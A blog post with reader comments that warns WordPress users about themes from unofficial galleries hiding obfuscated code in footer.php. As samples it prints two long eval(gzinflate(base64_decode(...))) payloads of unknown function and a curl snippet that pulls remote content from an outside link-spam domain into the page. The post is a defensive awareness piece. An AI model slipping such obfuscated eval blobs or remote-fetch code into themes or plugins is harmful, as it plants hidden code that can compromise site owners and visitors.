In December of last year I wrote a post about certain WordPress themes containing encrypted or obfuscated code. Thanks to a recent post in the forums I thought it would be a good idea to once again touch upon the topic.
There are a growing number of unofficial WordPress theme galleries popping up all over the web. New ones appear every day. While many of these sites are harmless a large number of them should be avoided like the plague. Why? Because they distribute shady and in some cases dangerous themes.
A common tactic of some of these galleries is to encrypt or otherwise obfuscate the code in certain files the most popular being footer.php. I've seen some cases where footer.php was clean but did contain a file include that called another file that was indeed encrypted. They do this as a way to protect the spammy links they place in the footer of these themes. The problem is this technique could easily be used for something far more sinister. If you have seen one of these footer files you know what I'm talking about. Here is an example,
<?php
eval(gzinflate(base64_decode('NdJHcqNAAADAu1+xN9ulA3EItcFFGEQwElmgy9bAIECYJNBgeP2ett/QH39efn2M9fhSEvT1Vu1Nf/tCS/mWo7kU+L+4LAZcvr2esGG307Aqiu4TdBvSyxO0lqpMBFRxpmq+baiqjnEHA7+uNCeEIpVQMuYv3GHvAWEnB9Mpvuzp6ZCzIJGnzx1RqN3IZMbuavWpdGssuM40PrnUqj4sB7ny/uAZ2jdcq0iUUMuyLKKjEFLYdos2EbC0MI5GEyPfNf2OSlBz3rKShNtgeJAhk181CW+z/IWfkr3AcvrMmdC5d/eojo5gkYluZCJIeclQvO7uxauwrL6wTtEhH/Vj+iwhTDY8PhqVBQV4RkAdnZZpZNM8VoE3H8T0vipOEuhTLDWoYXQ2IpsXhL3d+cJVGcxvYFYdZShr8Y0fGbtb52ah0RUkk3GmCyazuKU26fIsH/uBRXq5TCznfoNmtBdxLqZeEFOdFcyxOU2cmGMlJ350kFHnXIxbe2W3oq5wLArOYMxDi9sIzkDhBSZivNqY0zbVSZQ8HK/qm1DrN8lNz6ENUzZwraEzx7ieg4iXNO0YJPaucHXiut6DQ87pZoeEV2ja5mmpA1IYVzYILtAj4k6Sar7NNEsxZ4qq4O/X9/f3ny8f/xP9+Ac=')));
?>This is potentially very dangerous code. You have no idea what it is or what it does so uploading it to your server is just plain stupid. Note the line base64_decode(). That command will decode everything contained within the () while eval evaluates or executes the newly decoded code and therein lies the danger.
As more people become aware of this practice the authors have begun to change their tactics. I mentioned earlier a footer file that was clean except for the fact it contained a file include that called an encrypted file. Here is an example of one such file I inspected yesterday evening,
</div><?php //content ?>
</div><?php //container ?>
<div id="footer" class="clear">
© <?php echo date("Y");?> - <?php bloginfo('name'); ?><br/>
Created by <a href="http://www.themespreview.com/">Wordpress Themes</a> Preview | Supported by <a href="http://www.hostrefer.com/">Web Hosting</a> Refer | <?php include (TEMPLATEPATH . "/relay.php"); ?>
</div>
</div></div></div>
</body>
</html>
Now to the uninformed the above footer file appears clean. What struck me as odd is the file include. Note the line <?php include (TEMPLATEPATH . "/relay.php"); ?>. That is a file include. I wondered why a file include would be inserted into footer.php so I immediately took a look at relay.php and this is what I found,
<? eval(gzinflate(base64_decode('FZfHDoTYEUV/xTvPiAWZBjmMyDlnNhaZJuf09e7pNVLDe1X3nvPXf//91z/KM+3/qN/vWPXpXv6RpVtJYP8rynwqyj/+KSSNwJ+mvPsp2vUD4V6mNiWK2uOtEndw+U36ZEFB4LQFrf/gL6WDIHie1olNL1EBCzrEG4DYJ9gt3ppzDkgeWqYv2gli+62ivJRWakmB1ickKqKdpGYfGJcvb45LejtT9J1rEcb2uSMLKhWryFN8HPI08MUpbDdfCYDtv4yQuOMQUlfv4WFkFSPDLhIqXsj3UdOZjgQytvBYRAXru4vFMdoJoWApGlF74s6yuMCUXfoZxHM4CmXqWdnHtx86PTZbahonvEc7LLmtiz8tc2YLaaEkT8etehJoK7zSBrkEtXz4OPrkpExBr+2qJr3r37AhRUyB3eFD67eCLctqlHiirN89ID8XPsOh6mpaAZJa6wf+F+2Dcu7oNRzEOaV7TNPIT3GQa2ZK7Nqm9ZkRnIQhIFUiXAeJlxN5Fr6MOMIcoWdCagSnS4ITFMndvErT0Hjzwm07AxFMUqldIjdn6tYA5MUfmPrYFGHy7E55Nj4Me//Jqydz7NpVv9nv7tIp96OKA0PHsvfoAPRhQK32dxU+MeRMZLwkbibZx11KMPoci/S+PtypLuqyhxaMVX52hqbsRxvpDoGi351nrS8ZizosEQdzAscFyU2s2sJTrughdiwKOz1GXVP0AgADl4pYBYrUFjcAcwtlIMyjXOSAvpN0LY+clOq2P6c7I/3CqZQXXczH2xyf3AOk+YQtpSrwSxQ6xxSF0/ZJ4cSoQ2IDs3xalsBNTYxsG5kg12QLa0qOMP4evUmnY60nEjaXzP0GpCl5tLPBGsy7MIg8Xz1+tznUWnJRSjIO0y2evkKdzE3v6V6s3gK4k0bZCAk0Xo5u27zqcJ0Ht+J6oV/LaD9j6iYQHRNvjDPwy8FR//1oPLo+bFjergU1U/twO/G5HMakgGz/QnTolnXt2tp2PpCt3nL9ulxE0R3j8Y4DfxPHRC6KkyXDYSlXvFgCmRM+ydhPru/CNNz7skooHDMcp9jVUNk3zDhRBvCDo2wKowoW+glM5gAmTkD3+mk3jDUQlHB2XXJ2+bPlUebzEK5KyOlZlsCReKI6QNytbF+07edJJC4/zm8umDkS2nekndxyMNKEUzBzP3wjs9+tx/JGO152FJ9QVEqLoVdJhDHf1yGUK5NpcQWHCSmpgNMISDTHUaLDSmkR+9jVo3twn5mAHKo9Gfh1EiIiOe09wvOCA+0jCV0a2nV6Zzq8HU6jK8q75wZC1K7OLdkKa8ZnHGI8ENgYbYdptSi2DWFkDodbR3pTeQedylN8kx8eQCr2pxtrj7xEvi5tcNELi/9Iqah1eOxQ432YQSQjYrOwuhnh+zYvmpxNk7yytiEItW3L0LFMeFhTcRbEvJucOhM2ssxtt0IBXXd/w9EZmzHAlsJvA8yy6KjqNVov396+yavjCFm8KqZ5x7jXFQxKSIT+xv5gQN4g+rogK6S3zeJe9UEwRtTGH0DLXkCchZTubwKoaT74sXo2h2jBh7ex0WfBsqQWfSBNKHF0A/modnGsetLYnbmwCybb0w4kcDMoHZ3UeZH97FgsQ5dRvsA99Fa4J3WD16TqDZVIwYffjmk5eyfrLo14VsMSms01dXB+mNy5/HIJqWvMmwmi7i+hbTpPoU8zQPe8I0GGmsS4xOZiVJO471+IPA7A9k3yx3IzMA85iqEp+HjQz6Aen2cERx+CFHQLZ89uO8KCIBQ6OXVc3RMPUR8bYuQzYZZ6oco21PzrhMDorVMim5WAxCQzSREpJQoWvsVF81wBFocn9CF+SlhK7fOK8O4Xk9h5V3ePk4191QucXbS3l+EuMWdDWPyzFnM0YWR6r6o+pwuCd+M6IzqSOpoWZM5EcEQH2uDhdRPAZrvQN72SsPi5V54EqN9BklvGndd8oD7aJ5scARKq9FcqaRNbau0Sizrpv50fkouALbqVCkl4gNmXcb87YFL14W8b+NS+N4iNbuKoDkZj9lpVWS5lPc2EiJjwayy15SyV0FqD3IQHNy5Kja/1XcBTMx6VsBBW5OqoTE3m+iS5xE8h4T/ENarWWh+jC1PcN45iQRFgwi5EKuotnpPtOeEAv4aAD6xus4CpeIe9n4bh5tyuwJqtuk8birs+3el6qOjlN4c8vaMHVtIgyDJFDYhd0x6PeZXTG3f5tmEGo8NgmfDOsOF18tkMWv5KswqAMWfU26cYxoL2CXDZcM85+3IWkQGhFetrc1FxMZSV7GmoOLVi8CQe2hrgvJIyY6+VVlt+U/JB5LWV2G0mEPsCmqSGeqgfSq6bD4zFXZjrtFglGXHhF69cSQcsmCAC+25vZ+TZiagLY465fexMvxzhzN9ZmgxVbDqxGR0PgHRlMJtWamYWUWlACUh76ki7jwNXiTSes/2dVqjvNkAyp3ljq/khiDTfU9nv3sX8NWCUKoS1auGBRMLvbOyA1ZTfbOU2FRgqnlJVcv/io/22rPELJy1CiUVDX4wPtucyTCOtL1VmBfV7iDCSNq15I8QEM6junLl7ZMqRH+bHf045TGgDu5J+jzxc+x1b6sgwgO4bWtu+7WLgY8IoGi1qdcIejiZFwux7sWebgR6+PP1qcO6n3RvCj52uyhT4zwE1YJXk4+iV8QaGUiUt89j7oWhEywcq7qp/GW6YOE1k5jx3QoHyeB3XVIxtEOlXqp23Ai2+uBspfyiomvq9mpBB+/rHj7swi24qiHEWboa3qNohfyIiBKhIEE7D126RoA6k9wss7zq5xf0BwdrEBwxW5pAmlOheWngHb02sXH5MS/1DAYwy0y2DsPkJGaBn2WA7qzsdq8HUleD0rFqxAvXNWJUhQ0IbZ9KBzQyKPeQcNntZxCVKfv0XyK0HWOp7ttYEWtf30TT+nqNYzb0I0T3WmAdolQFP0sOxHTKMwt8Fr5S+kPTNhlaBjXER1E9RigCiLSyL+y4GMvC+U2cbym5CBf6qyzBueNLMJRq/s6hmL9x+HbSuI/BJbvczneQdN7OeNyWtTq3b7mGfj1J1NIwT822ufe+AuydbPzYwtzpoqG7BHNcSwRimt4Lchx4484Lvk6jHzGEua88sAokWh9Ap63+WUqBj7SbQscN1g2gHDAgdSXCGnSr1ol08CHn2RJWqvGhrzf20XkBTCf3JuR17dBSLHtnSFFg82qJjkuxlaYlCfL1ceyTDnKY8zUjSkfybdaHZ7YcrL6scHUIHaaupaWWVB125l/JGiiW94vwYVgQg9Wn7ZsGwjE85JeNnbraF9hVDIFSnsLZxPI9NiiOt2PXwVwLREvP61384LsxucoSewwTZVP0InyqWH19VR751Lkqm7C/1i9fCuFxq/9rXqvc+LBz2mDI6AKjoR8Nl4v6qiGwIh8QFoAFX6SNwQVn4vIfp45bjmojVSGTJZfsI8UkTogUvIfsZpIbnYA1yf7mTAPj4YsGiexPpiHkvUpuWnncwEX6OGAWBqQLximlgyxqANzzjTyo2c7RSzRBf9xDk1bwb6goXxMgkf+Ngfq4RuGzDOnzyYhdoytKqsA6xssvfHwUsp+VP+EvUk24v/PPwYSAsCF1eqkSNbXtxFSIwejyLv0h9XYpsD9H0w/D6RqRGOUIn30HFBqaTPQ8eg+IzgLMZGiAZaPT7jlfCCEJ4AKw7EucrKgWljdeOrt/XNxG/Q+AUE3JagRb+reDlzVhHMwDEvb9S2S7O+6WD2efCYLJga/i21gzkGyI9lAaHOHI0x4raCYxharhDLSX1zBOERKhtkDUWkjwsHkMeAYO0MrhrkWl8B2xkrqGQh6v+nsb65LW2vr8RyUerYQXPNR+dEqr3/cJwSQNSO9Fj44arY9g3DxGHG0agFZmlg0SUfYUicaiT5PYk1X/zrzZ74DKI+zi5hP9tQDZMNPwA0NqZGG3N7t6biw8Un9CKbrYsdTvNlwpxqzaS1rnQ1cEjmd5wyTt9HNQ9VeB8PpsJj6z4gutWKxRTbs9OiPDKfZt5dtxSNCnr0FUW2wiRQufVaWQ3zJZPdSAl7NtS/cTuxpdJ39XaISESHQqgNDb3EFz6otYUbsiaBUw89fpXR32Qso5JFbGPBYWfQFqjei2gd4uvo9evZLVaqx00M8pVAdN/x4beWSwdOrNY1Gk02cm3345/hysMwRsIxFMzua/TfvrnxVSAjEpH9LT0wYqUoGfb/ppXHmPQRmcTpytElfPAMhU4IrUEmcI+JFLsS8XA6+qhreiT3uRlp4NKj/GZI5Y+d62f4+r0Wet+bk3LI65cOrNTOasGhFmRn2xZYo5axPpAegYjZlQHiYA28E16qRciX+8LthLofhDvogDerTMX2w+10yfP/oV4/BPSt4pKoUt/2wp6dEU6znctsgXhVQtLpm0VTjD0E/ZDn/pREjJ7NsLltrFbZTfqeAxvgr9iq7gQr5KJPi0Hb2n26PDNqnql20pVDQIMXLgWlFq3ilZt2GfDJqatm8kZPxVG1FxPOpU8G372VVU6wsNFGWkCtv5y/dEav8hkGuavkbLtfGHR1PslGwGVSP2WOleUbX/+8rbTikBACI1hjhkEloZwf/yLR9b98rwiuW77oM9x7qQcPHSeM478VJ8fmqjcqiHSEUz14I9ShMzqR5aNEZisYFySQiwFl4BGJ+P505YRWx8xZG3eQ9mxUsqtpU+ylJZILpSgYEs05QE62arr9lP5Pu4qVY2byydra3s5koyxaUzfyZOSfTIvbzQBOW3+iB9xiNJcoFBpkhOR9x4BueV079kHklMiYR/mLNXPDTg/F2UDmoSn4M0oeMuYjEvZkxFnMp4BtE/lOjdseDYnjSW4/XgMzf56NS6YlU/lA/iafFfDK8BE69FGTeJFnKLcJZQXDKVztVspIPDlZ9PgJiDSputvcCxfisVG7pL2/rxLpIWodXjDIx3O4U0XekzRTx+R3xvNkfNhIpe4r1fJUiNtPCpS4bGIGFVKTKcdPihMiIx2aNoe2HGp704UK2eTFwO5rDXOh9P89c92DZZR6L/Meuaz1HnY9WFjaUUGga79EffsPOeFb/NsE0JLrteEEcBM5HJjOWIiHbijho3k91WSoBN9dUvDfw63F+NaIIjFcFa8OLbYOz/bcShUByKYGrWh9qNQ8zSy2wGbMeIqPUfMeHAombh6DOT4hAWNPw8rdGS90w+Y/XEjExY2ObgLwy44sds5/Yg1rQaZnauhP8rKBF3Qjv/GoGrx2m6QznTlZ/6lj0y/8McIrLN3s67wpVQ1VN0AFPy89RghUNwVmsjfwxXKZYlyglsFxptEojuKDL8Cr/0Lnh6Y+jTU13jNkPER2Xh2U3Dzi6HRhDigrdMu8nNqR2BsdH6qeHiJOD4EojVZS+tzG6nnErRh/ejGeYUdyrYYhFOw9DPKpiBUMmo+DjZfo5aAfvQ1fYwvmXT77fKxmK+c2/m4Z5W4z3US1ujsbMkHEZ6btiFgxSO82hXqRxd5dJpddJ8PBr+RXZmGmXmA9rHugVf0nBnc38zJ+GMUBtesWN2Is/BDxRC3t0o3cJST5pHnf0p1iXmmSQZoFzBDolh5m/hiVwCHkvoeYIKHdWwUCVcZsdJzR1jLxyQvUUybVOktb+f1zKL3/bYkbaM4BHSBNnVPKmtgOHxkySsQ2U8HHV8ytoZ/l0EGjscG6/hZe5qXKsYRI5cnQMqeQZFDRQsfdymg+JvstGFYQ3o5YMDn1FOYFU4e7qp52G+bzwiPohmZvhbLrchWnhu81qfK3GQ18snWnIQdS0oHBUoHnsCxitBXY5V2JfWNCMtr+kxdx+MFOX0Gnr+oFy1xk/+0FIHOP83fmiUXfdoXUuGbJZ7G9erTfW94dSj9MV0nASny0+vAVe9PgdHuzqUNKh83P4N/n+mv0/jUXHhau0ej4Q4/3EaK4X7ILGIP4EcPj2KoXMLKVYE/aBRxx1H0OeSPp7efqn1TlgYK82trpqHOcA+BhXaZJdRpUdNFnyYZvoHfKBluG/jzetluywdAVAzUw3QF715pqwJrey2BgI0r1fKXyx1nHdLT9pYjf3H9OMNq5lpBggidZtkV2qGcsXYs3u91rUwOhUc697y7MV4NJYwJ0D3VfF6Ww+fe6/IpqmQCSZZxqtLZiFO8wO5FZhAxXlYFzWgXnVBdtILV06MPVdwcrfIFIeLItxGNtm2wDts8ekHcefw1Z/0y3RX8Mp4x4xUM8dUz4jZPwFkq4XwlM1hir+CTZU0iASzqBZ/i0DrO77hYvIbssMQ+vVJvr0SPmuRA5iF+WFRkmb2qfl9fiX7uAkkZT/cOKEyjCi3oPmzLLzd1sfqBWt1THXSgzaB/2l2XtgtCPkaFPzysS4TxZXjfHDS0foby7j9oU/W3KHujOuRvr9UKCdvlnP2UEgu77rA3oZU+X0WtV36WWGJj2M4s8DAGwUBJ7ty50s2lb/wTouDBXFPZVljjKvEEPcLM0lUafB5TQsvp4PnViaQiEX/iU5+ZjmRQyLz7TzP58LvmdXjTpcIftXBrhX5N+k3G2KFdZx5MtxmOOTIuFyXM169UFCLtnwMLScrHZW1pgTOxFMKXcC2I8VIJXlxmBA2CTw5gxfh73koD2znjZZ7VRwwjaQuREhT9dXv5Zi9LKkquFphw39LiGDu3BkPoXaoTKqOAZ+xvRH3qsJwR2/UKoW97x0FfJYFFE0Iu/W3bCd+S6OgxyKE7yG0M1dVsYEYEHnB9z5FczA+adCGdsxZOU7/n8p6KY/PP2YVYRA811WqWr+/KCvfEFyRBCeQ/xiLQO1J+xN1HZko6pRWTKCBPXkn0OczDZ51vSDfmIeUp5ShphPRwI0GXfdpoS7PGMU8A/P0dCWB1844G9+LSHzrA5nSjVJinjkiMx8mv/XYq3fT5AZoa9lgzQPqDxHkzjUcMvWy5CrhFAC5vbRmFaOGqeU5vekWls7UrYj66bSbpeTp95SdRnI21NGMGNgLALY4q8n7dnFRYKoZing65MaD9ursVXSlkmejdCKKtUp8HSrPuK6cwJjzOTls3Ibr2ml4l6K7QhPiSq0ZpdCKbQ6McZgrRbZMyfgu4f3epS3y3eO65j+T3vy6GrQgJKdcRkOD1mPTHEh/wc7C4zr5oPnTw3jw5OfmdZFFvpoTZLtH+w9vJsOan7KnrC+OQxWpzMooGEKa/18BKdfhhSuVMKpGA4IsHAiPrrGAlP66b6Y76EVG4KxjRSpU84J3b+0+s2ZC3zMftIxk7Sd3YBrER6b7RTB67vW4uOsVT9+JN5AknvL3JpmRbsrzWEjpza5U+EPFmQvP5+6Lyu1g0Z6E6vgmElQlcDSQJ9hseRZvLI/K11gqpnsbg5hXJlDUSf6/tVyace42QdnwYHk4ff137plEoqxz2VDN73FXrxqk5gkxeG1B3jeOR7BiRkz+9MkfA4ePdp4IwWKvLnPuTGJaOdCBw8vpRua+1H+8XGZzDTzbzmqvkMwLfIAE6JNSoxnw+/J3wyK1u3Y40qKPLqjXkhiIntqBOxfUYw5eOPcGzmDr1t5MBtJ95hMl7pH7xtyE8qwJetW/R4uHeSERTPwMqeHlGrUMKAXKBo6zUaC/f56V5jptNoXFReW1Fzz5Pw7UZjSKU7KXvDFFBVc4dNIV+l1sA5y5ooEOzbzvQwxPiV63ohJ7gnx6Qaukn1hGNJa/RZ4Zt/NDZJQLD4JxOBQ8YKt/yXV1FJc5FAoS9jaVQYZ/W8IG9N38zjf/k1xaw3bhqc+lu0ifUe1nsoLXMMEI5Q3i95uKTvJBUzQkX0jtRotUO5q3iup7e13RuOrS+jSFNjmGohUVC0goLsyCk+eSjlxQT8NGfXKb/sOltg48Lhz9idYAy8zLKwMHThcBBpAMO5L75JiJVnrBJ51IrBhqoBMNsNoS2JgxtGhsPD46WR/ps5+TbaX2ByT7o9nqwnqj3aNuubgsk7gjq1CgN0qxslCVhBNp+O1/zKzw0L/35tLf70tuqEfGAnFEMfBO/4nVXoZmocMeTR0HLFt+c/IzRttefeAOShQfVe186CHGVQWRmynkWrfhNdHUEg1y1nXeyR0L2ZAt/BSEUgHIL1FkzzEGhSfuykd8tZsTWiyQvchsIMQlreefcMBZrjavM
F4IpZvdRsNSX01/KpOSC8ne+HNdBCpMbZJepc9cNtE2Yy4CfDluVhmRWz8TktelFQKFjmQICd9kOGgLcmZkXwnG3gJkYS4k+lOxvgojBS11U6dx8wu3mI1RwnthOhcwZIIIooMvDjrpZvJGxQXwnbldWCl99n7SdUeZWZ52ZPAfQcUxGKwwig8COcKKm+uP5DUvWFDN+3N3/ApJX9UIcqNg8A0HYtc7sNI8YOFgrVP5AQJgXACMRFtEQUvSuWNeOCFgG4DvFjaXvgaUIM6BYFmLMHntNr8CqCC00FQUmMLjbL5gtWqSV657PZefnUq1+4yfR4XTyFyzXiaSoayYBJWOru+8HLSO1Zmv22nov7GIaTBejdqbiA+/8tv36GIWC3Cp33QgeJV2U63v8TDgkh0yD8zLo2g9r9lBhytZykNoS4yKClkTye2/3mTj79X/c8RurPB8E5mecz/P7ZgxFkevcwu3UmNjZ88ceKPDmAAhzKNW02Emk42niJRbdY0a42jgA3c813b2f4IN8/prxcBUtaYHthBMGIA2gHCNi2NnkZqx07PXroy7L0qiHDnSfeihtXAIHlqmUmpJsZKyhb1PUtKKb8dnFnhtNltVY8g3EeXiS+REpY7u5sAy60jx/zSCGr95ryi9S7x72XTAXlx3iXqp8Zn+A3ImxqsHYzZ1Hpxytcr0PTNswHflGZBM+0smyOJ8O0MxaHgFD0naNtFipJ1weQaMFEpxIVWIL0U5yerE1zYWnChO6mn0DsGEYZIL3JG25ZR+FKeS9tgGxEtGkpNHMAmEYERgGU2IjnkfNBkfOK0Gqqc/beIeV9IqEx8iLQ7Q/M261J6u4v08IN+VbKK0gf1se/KTevcubLdI3YMI20FhYVn6tMsz4rUrQN2fWNtnnWCpUqF70Um6KUlJApdUCwc21nuVoM9CV71xxHx9waQVc7WTumTuGM2l/U57YcIf/CYZC3OikGS9MOrT5K/WFoSbC9FkSDaSeMQFWJvq9Ru0h0oVBINZStqso9p+qScg6yOqOgfR2g6yqQ9rBrKgDzCNpQdZA37/JmvvGDFetNimNorEa8cXQZHpasWqKwop54Ek7G0dYCc2sFbnrUrrikC2dlzJqY+a+XhfSs0vhoE8Fy+5+8L7jLlyktRJjf7PejBJWRAJziCDmQWJvDlyWqaDQZoJVfhtaWlvjexWn0eOw4/Ed5ehhngH3hq5SbSfVr66Bue96QazVtCnhjk5bhqP3R+nPMjAHdd1hDd/6Oc2QZohRaEPfFM+Zb4Be2W+i5ieG2PpNV5agoQ/bMF/3y4AclkhVyGre78AothpjjnqxsUpmkP1K4yuLZnKm+Q03Hy9AVua+g4+AklZrxGU27lFx0JbQUrMejXw454Fpw8BNgHwjcubv9s52ToUQ29sHrT9jiljR6Bc7mlCwHdKKFg/LV1uY9hckDb2GER0BCB1Ia0Y96IFCfvJhUbNTxWuNplJi9w7pzNbl7GyJOyV0FAEwwerzOc3Mp7JGxBfcdYlD0mTX2Qo+NNTFWItpsP5mbdt6/UbTAoy95OojGGyISI/cpimrqOG7D8ylnXRJk+0Q4Iyo6SIRV3hvkRxBPLWYMKh67H2Oucoos3RbWkoSyEFk1dCTMJRXHz+TxVyyRRey8vniM0yQcY2LzZjV53rHOX5Q1WbZeElpGbAJR5yTUjjijuiZCcojRLTvfguw6XFIevzwmFaZzdV60mARxgNl+5nOSleEsWKN1ksY5KXE8Yu/E3K/CahCXvbk6IYH+n0JYscPWdkkM5lm2K+NtbHVTKeET+KG6Zck74nX/BH/QswhVS684TkIncwJ0NTx45By/g5AjK9PmxMwO5KrBiktFce80AucEFTMbXjONkUdq7cFVMFbrLVFQqYKfkQu/xaV4U2srlR7wNUhY1EH/JkomN6Sg26SspvxyxEPGuMpaEdSiVwxKnrbpyH1YHSBp19M6VQJS3fporaqc9/z099Q8vpFa4w3prGD7pVxR+ymTYHqbrbLgLLukTeLzply7lU2RmSpZmiX9u9JIL8cLmWSADo60eO+9YU6wHWpnS3/8NSxEFAbghxE7t+QwjJlUGVnGVYYQZT5FDCPimMmOMtsIVEKySmqHTuvghA8mqZ3Uwfax58gAwQd0uklXe2rd+TCCSuq083zkAPmVqLsEwETS2ZEB+aJANgNOcxHMrlA6oqLtUYXYKleLTz6b7GHE3gkI3tKjyMVuZTcLOHqhhaStIf6ezrjpdKYQ+g8pMft44Vezemk6Io+BiH2wZ7sR39zvkl1r8ofuwr+sLrl+eGqHtQTGJqalKxqdRvopGEWEvV85NEo9aPz44iU5A63Um4lcvggwV82AmDW7Qo9k+jXnRDFv+PHU15QR27EP1XrrmUtoKSf6ijWIjO5OsAO4+AuT4NHM+4MIjmtf4Qo9pWhEZGH8XtKSukXzf4LzZQwDqxNBgmYKV00idE9eHOjfnvLkHAXqFQFWxmqARNavqNisGBw6SNwV3FUUN2qfhpdYHYT0sWFez6f9Y5kPxM8yAoS6Wx2W6DhT31EqfHVcZAfC6mqYqGJ3EQ82LmQucYEB1cIWRt/8NETZ/t9p+QLEXhCrj4dk+RP0Ukqli28Ht37OPFFluAQKtzevHbeQ2Vz/U5IRUEpkWXJW72fQySu42O483qTy9nxXOUYFguPHRDh7tdKXBQsShk37Pd7wYHD3UqF1rBOkeIS7OKNI3Yp0lF5nJHlc0WXzRs+4RgEmnp0y02I9Qe3770usrPIjbzUQgPnvuhmkSfGJ7Hbql0ExUoRixLB5dC5Fy7aujiDhR4mP58UGc/1SmwgMgPUZtvRhLa0P0EgiF2sgWiIzwIjlvSHSk3y18gRpoVYOT8vsHOKt8oHYMfQaN8gLM8WFaJAYh2HFnTj20dZP/jDrQOiuKaWccZ5AptI/8k70ubvCuuTWgC8MegCwaZ4FNnyUc4raKy0Q1JpCeoIPbuHTrTCK5/0iFnDa8ZQdZ/0G/6RC0mDip9SEsC8vgJa3+gDgNXvB4JjBILk5wOCIEf+559//vnnv/7x13///df/AQ=='))); ?>Pretty sneaky eh? They could use a file include to call a file anywhere in your theme. They could place the encrypted file in your theme's image folder and use an include to call it. Unless you have some degree of experience you would be none the wiser.
An even sneakier technique and one I've not encountered until today is the use of curl. curl is a client that can retrieve files from a server using any supported protocol such as ftp, http or https to name a few. Here is an example of its use in a footer.php file I took a look at earlier today,
elseif(function_exists('curl_init')) {
$ch = curl_init ("http://www.build-reciprocal-links.com/wordpress.asp");
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_exec ($ch);Using this the originating server can display anything and I mean anything it wants to on your web site! This has absolutely no legitimate use in a theme.
I don't mean to paint all theme galleries with the same brush as there are some very good ones out there. Unfortunately there are also some shitty ones and the onus is on you - the webmaster - to differentiate between them. When downloading a theme from such a place always carefully inspect each and every file before uploading it to your server. If you're unsure ask someone or post your question in the WordPress Support Forum.
Remember, never use a theme that contains such code.
About Len Kutchma
Yep. I'm starting to hate seeing these things around. I think it's pretty bad practice for "legitimate" theme writers to be using stuff like this, when script kiddies use the same sort of thing to distribute their hacks.
That curl thing is particularly bad. People who are non-the-wiser could use that, leaving themselves wide open. If the curled site was compromised that potentially compromises all the theme downloaders. sigh.
Hi mrmist,
The vast majority of authors are reputable people but for whatever reason users keep downloading themes from shady sites. I don't know why this is. I'm thinking maybe its because these users are new and don't know where to get themes so they start Googling around and end up on shady site.
Yeah that curl bit was a new one for me to. That's the first time I had ever seen it used that way. I wonder how long that tactic has been used before I became aware of it.
Wow. I've occasionally encountered themes that would refer to a website that does stat counting... I noticed some traffic in that regard... but this, this is a whole other level. I'm glad that I build most of my themes from scratch, but it's true... until now, I've never inspected all the pages included in a theme. It's definitely worth while!
Hi Ruby,
In the vast majority of cases this is simply a technique to protect the spammy links they stick in the footer. The problem is, as I said in the post, this could be used for something far more nefarious. Best course of action is simply don't use these themes.
The WordPress theme repository contains thousands of clean themes to choose from. Additionally, there are many reputable authors in the WP community who create wonderful themes. A few names that come to mind are Brian Gardner, Cory Miller, Nathan Rice, Darren Hoyt, Justin Tadlock, Derek Punsalan, Adii Rockstar. There are many more, these are merely a few of my favourites.